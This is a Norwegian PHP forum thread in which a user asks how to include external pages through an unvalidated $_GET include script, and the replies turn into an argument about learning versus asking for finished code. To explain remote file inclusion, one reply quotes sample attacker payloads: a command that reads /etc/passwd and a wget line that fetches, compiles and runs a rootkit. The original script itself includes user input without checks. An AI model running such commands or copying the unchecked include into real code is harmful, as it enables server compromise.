Gå til innhold

Eksterne sider i include

Anbefalte innlegg

Loomy var så snill å hjelpe meg med å lage et include script.

Det jeg lurer på er om det går an å linke til eksterne sider, som alikevel kommer på min side??

Scriptet jeg bruker nå er slik:

<?php

$maindir = "./inc"; // Rotmappen for alle inkluderingssider

$ext = ".php"; // Filendelse for inkluderingssidene

$main = "hoved"; // Siden som inkluderes hvis 'side' ikke er definert i adressen

$side = $_GET['side'];

if (isset($side)) {

include("$maindir/$side$ext"); }

elseif (!isset($side)) {

include("$maindir/$main$ext"); }

elseif (!file_exists("$maindir/$side$ext")) {

echo "<h1>Server Error 404</h1><p>Siden finnes ikke</p>"; }

else echo "Siden kan ikke vises";

?>

Må noe gjøres i scriptet eller er det bare en annen måte å linke på??

Lenke til kommentar
Videoannonse
Annonse

Fra manualen:

If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using an URL (via HTTP or other supported wrapper - see Appendix I for a list of protocols) instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using an URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file's variable scope; the script is actually being run on the remote server and the result is then being included into the local script.

Warning

Windows versions of PHP prior to PHP 4.3.0 do not support accessing remote files via this function, even if allow_url_fopen is enabled.

Du inkluderer

$maindir/$side$ext

du må i så fall inkludere adressen til siden

Scriptet du bruker fungerer litt feil vei:

Star med å sjekke om filen eksisterer og så inkluder den.

Bruk også empty() isteden for isset() da isset() returnerer true når variabelen er satt uavhengig av om innholdet er tomt.

Lenke til kommentar
hvorfor ikke sette seg ned og lære seg php istedet?

ingen her som liker å slave-kode for andre, men vi hjelper gjerne dem som vil prøve selv.

Hva med de som ikke har tid til å lære seg det??

Jeg jobber 8-14 timer hver dag (borsett fra søndager) 13,5 timer 3 dager i uka.

Har ikke tid til å lære meg det nå, men trenger det..

Hadde jeg hatt tid, så hadde jeg lært meg det.. Enkelt og greit...

Lenke til kommentar

Hvis du ikke har tid til å gjøre noe ville jeg ikke tatt på meg arbeidsoppgaver som jeg visste at jeg ikke ville klare å gjennomføre - det er enkel logikk.

Og med en sånn tone tviler jeg på at du får noen til å skrive et script for deg.

Lenke til kommentar

Jeg har tid til å gjøre oppgaven, for det er en oppgave på den ene jobben, men jeg har ikke tid til å lære meg php akuratt nå.

Jeg er ikke den eneste som holder på med den oppgaven. Det er mange andre som har meninger om ditt og datt som jeg ikke kan få gjort noe med, derfor trenger jeg det scriptet.

Og med en sånn tone tviler jeg på at du får noen til å skrive et script for deg.

En sånn tone?? Forklarte jo bare at jeg ikke har tid fordi jeg jobber for mye.

Men men, Loomy er vel en av de snille her inne han da... (og dette var en "tone")

Lenke til kommentar

vel hvis du får noen som kan skrive skriptet for deg, så fint for deg. Uansett er dette et sted for å lære seg php, ikke få andre til å gjøre jobben for seg.

Hvis du ikke har kompetanse til å gjøre php-delen av jobben, for du si fra til sjefen så får han skaffe en som kan. Du kan hinte litt om arbeidsmiljøvernloven til han når du først er innom også.

Lenke til kommentar
for å holde oss til topic ;)

høres ut som en sikkerhetsrisiko å kunne inkludere eksterne php filer (fra andre domener) så nei, jeg tviler sterkt på at det går.

Spørs hva du mener Ueland - du kan selvfølgelig include sider fra en annen server, men det blir kun output'en fra PHP.

I hvilken sammenheng er det du skal include sider fra en ekstern server?

I utgangspunktet så trenger du bare å bruke f.eks.:

include "http://www.EnEllerAnnenSide.com/index.php"; så inkluderes den side. Den vil da skrive det som står på siden der du har include i scriptet.

Lenke til kommentar

du bør vite på forhånd hvilke sider du vil inkludere. for eksempel fra hvilket domene og hvilken katalog. hvis ikke kan hvem som helst gjøre følgende:

http://ditt.domene/din/folder/dinfil.php?e...rl/hackerskript

i hackerskrit har besøkeren lagt en fil som viser:

<?php

system("cat /etc/passwd");

?>

f.eks...

andre interessange ting man kan ha i hackersktipt, kan være:

system("cd /tmp; wget rootkit.c; cc rootkit.c; ./a.out 'have fun'");

Endret av Torbjørn
Lenke til kommentar

Fant ut at eksterne lenker i include var litt dumt ja. så det dropper vi..

Når det gjelder det å lære seg php, så lærer jeg faktisk mye av å kikke på kodene jeg "får".

Men skjønner hva dere mener, men samtidig er jeg ikke enig.

Ingen av dere har noe med hva jeg har sagt at jeg skal ta på meg, eller hvorfor jeg "må" gjøre det. Jeg lurte bare på om det var noen som kunne vise meg hvordan jeg gjorde det. Loomy er heldigvis en hyggelig kar, og han har nå forklart meg hvordan, til min fordel. Lærte faktisk mye av så se forskjellen på det "gamle" og det "nye" scriptet.

Men har da altså ikke tid til å lære meg all den php jeg trenger for å lage det lille scripte NÅ...

Lenke til kommentar

Unnskyld meg!

men hvis vi ikke har noe med å gjøre hvilke arbeidsoppgaver du tar på deg, og hvor mye tid du trenger for å løse dem, så har du hvertfall intenging å gjøre med å komme her å unnskylde deg med at du jobber så mye som du gjør. nei vet du hva.

Som sagt, hvis du får none til å kode gratis for deg, så fint for deg. Men her driver vi med generell opplysning for folk som vil lære seg php. Å slavekode for andre er noe av det minst motiverende som finnes. Den dagen det blir vanlig her kommer hvertfall ikke jeg til å gidde å lese dette forumet her mer. Og jeg er ikke den eneste. Håper jeg.

Så erkjenn at du her ber om hjelp fra de som kan mer enn deg og erkjenn de vilkårene vi har for det vi måtte ta oss tiden til å skrive her.

EDIT: bbcode feil

Endret av Torbjørn
Lenke til kommentar
Er enig i Torbjørn her.

Hvis du ikke er interessert i å lære, så ikke besøk et supportforum, da kan du besøke hotscripts.com eller hva det er...

Det er det du er ute etter...

Hvis du leser litt, så er det ikke interessen det er snakk om, det er tiden.

Det tragiske er at dere har brukt mer tid på å skrive ting om hva deres mening om at jeg spør om noen kan hjelpe meg med de få linjene i koden slik at scriptet fungerer, enn det hadde tatt å faktisk hjelpe meg med det..

Og som jeg sa i en tidligere post, jeg lærer mer av å se på koden å skjønne den, enn å skrive alt selv, for da blir det bare kluss. Alle har forskjellige måter å ta til seg lærdom på, og jeg har funnet ut at dette er min beste måte å lære koding på, enten det er html, php eller hva det nå enn måtte være..

Hvis dere absolutt må vite hvorfor jeg tok denne arbeidsoppgaven, så er det fordi den først ikke innebar så mye avansert. Men etterhvert fant jeg ut (etter tips av brukere på hw.no forumet) at den beste løsningen var å bruke et php include script. Da mine kunnskaper innen dette ikke finnes, og deadline er rett rundt hjørnet, så jeg det som naturlig at hw.no forumet var et bra sted å søke hjelp, da de fleste ferdig script har mangler og feil...

Som sagt tidligere, så lærer jeg mer av å se på en ferdig kode og analysere denne, enn å først finne ut hva alle forskjellige koder betyr, hvem som må stå før hvem osv... Da jeg denne gangen har litt dårlig tid pluss at jeg har jobbet veldig mye i det siste, har jeg da altså ikke tid til å "lære" meg det NÅ, men å lære meg det etterhvert har jeg ingen problemer med.

Det med at jeg jobber så mye, var ikke en unskyldnig for ikke å lære meg php, men en unskyldning for at jeg ikke har tid til å lære meg det NÅ for DETTE scriptet...

Jeg har heller aldri brukt ordet "slave kode"... At min setn i den posten var litt uheldig, og kunne tolkes som om jeg ikke gadd å gjøre noe selv, beklager jeg. Men alt er som sagt pga ting beskrevet ovenfor.

Jeg tviler på at dere aldri har hatt en arbeidsoppgave hvor dere kompetanse ikke har strekt til og hvor dere derfor har måttet få andre til å gjøre jobben for dere, pga for dårlig tid. Å gjøre dette til stadighet er jo ikke akseptabelt, men at alle kan "drite" seg ut, og få et problem som ikke lar seg løse på egenhånd innen deadline opplever alle mange ganger iløpet av livet.

Håper denne "konflikten" kan la seg løse uten flere missforståelser og "drittslenging"

:)

EDIT: Hvis dere ikke har fått det med dere, så trenger jeg ikke noe svar på problemet, da externe linker ble et prob, MEN, går det ann å linke med bokmerke i et include script??

Endret av TommyFM
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Opprett ny...